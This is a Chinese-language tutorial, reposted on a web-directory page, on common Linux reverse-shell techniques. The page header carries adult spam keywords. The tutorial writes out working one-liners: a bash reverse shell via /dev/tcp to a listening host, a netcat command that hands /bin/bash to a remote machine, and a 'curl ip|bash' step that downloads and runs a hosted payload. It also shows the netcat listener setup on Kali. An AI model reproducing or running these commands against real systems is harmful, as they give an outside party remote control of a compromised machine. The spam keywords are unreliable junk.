日日操夜夜添-日日操影院-日日草夜夜操-日日干干-精品一区二区三区波多野结衣-精品一区二区三区高清免费不卡

公告:魔扣目錄網為廣大站長提供免費收錄網站服務,提交前請做好本站友鏈:【 網站目錄:http://www.ylptlb.cn 】, 免友鏈快審服務(50元/站),

點擊這里在線咨詢客服
新站提交
  • 網站:51998
  • 待審:31
  • 小程序:12
  • 文章:1030137
  • 會員:747

1.bash反彈shell

個人感覺bash反彈是最簡單、也是最常見的一種。

bash -i >& /dev/tcp/192.168.20.151/8080 0>&1

 

bash一句話命令詳解以下針對常用的bash反彈一句話進行了拆分說明,具體內容如下。

Linux幾種常見反彈shell,想成大牛的你必須了解

 

其實以上bash反彈一句完整的解讀過程就是:

bash產生了一個交互環境與本地主機主動發起與目標主機8080端口建立的連接(即TCP 8080 會話連接)相結合,然后在重定向個tcp 8080會話連接,最后將用戶鍵盤輸入與用戶標準輸出相結合再次重定向給一個標準的輸出,即得到一個bash 反彈環境。在反彈shell時要借助netcat工具反彈

Netcat 一句話反彈:Netcat反彈也是非常常用的方法,只是這個方法需要我們手動去安裝一個NC環境

開啟外網主機監聽

root@kali:~# nc -lvvp 8080

listening on [any] 8080 ...

 

kali : 192.168.20.151centos:192.168.20.130

先用kali開啟監聽:然后centos執行bash一句話。

Linux幾種常見反彈shell,想成大牛的你必須了解

 

 

Linux幾種常見反彈shell,想成大牛的你必須了解

 

成功反彈。

2.netcat 一句話反彈

~ nc 192.168.31.151 7777 -t /bin/bash

命令詳解:通過webshell我們可以使用nc命令直接建立一個tcp 8080 的會話連接,然后將本地的bash通過這個會話連接反彈給目標主機(192.168.31.151)。

 

先開啟監聽7777端口。

 

Linux幾種常見反彈shell,想成大牛的你必須了解

 


Linux幾種常見反彈shell,想成大牛的你必須了解

 

3.curl反彈shell

前提要利用bash一句話的情況下使用curl反彈shell

在存在命令執行的服務器上執行curl ip|bash,該ip的index文件上含有bash一句話,就可以反彈shell。

例如在自己的服務器index上寫上一句話

bash -i >& /dev/tcp/192.168.20.151/7777 0>&1

192.168.20.151就是作為監聽端口的服務器用來得到反彈的shell。

Linux幾種常見反彈shell,想成大牛的你必須了解

 

存在一句話,利用curl反彈。kali開啟監聽

Linux幾種常見反彈shell,想成大牛的你必須了解

 

 

Linux幾種常見反彈shell,想成大牛的你必須了解

 

上述內容不知道大家學習到了嗎?網絡世界的安全漏洞每天都會出現,安全知識和安全意識每個公民都應該了解和學習,有想學習網絡安全技能的小伙伴可以隨時私信我哦!

分享到:
標簽:反彈 shell
用戶無頭像

網友整理

注冊時間:

網站:5 個   小程序:0 個  文章:12 篇

  • 51998

    網站

  • 12

    小程序

  • 1030137

    文章

  • 747

    會員

趕快注冊賬號,推廣您的網站吧!
最新入駐小程序

數獨大挑戰2018-06-03

數獨一種數學游戲,玩家需要根據9

答題星2018-06-03

您可以通過答題星輕松地創建試卷

全階人生考試2018-06-03

各種考試題,題庫,初中,高中,大學四六

運動步數有氧達人2018-06-03

記錄運動步數,積累氧氣值。還可偷

每日養生app2018-06-03

每日養生,天天健康

體育訓練成績評定2018-06-03

通用課目體育訓練成績評定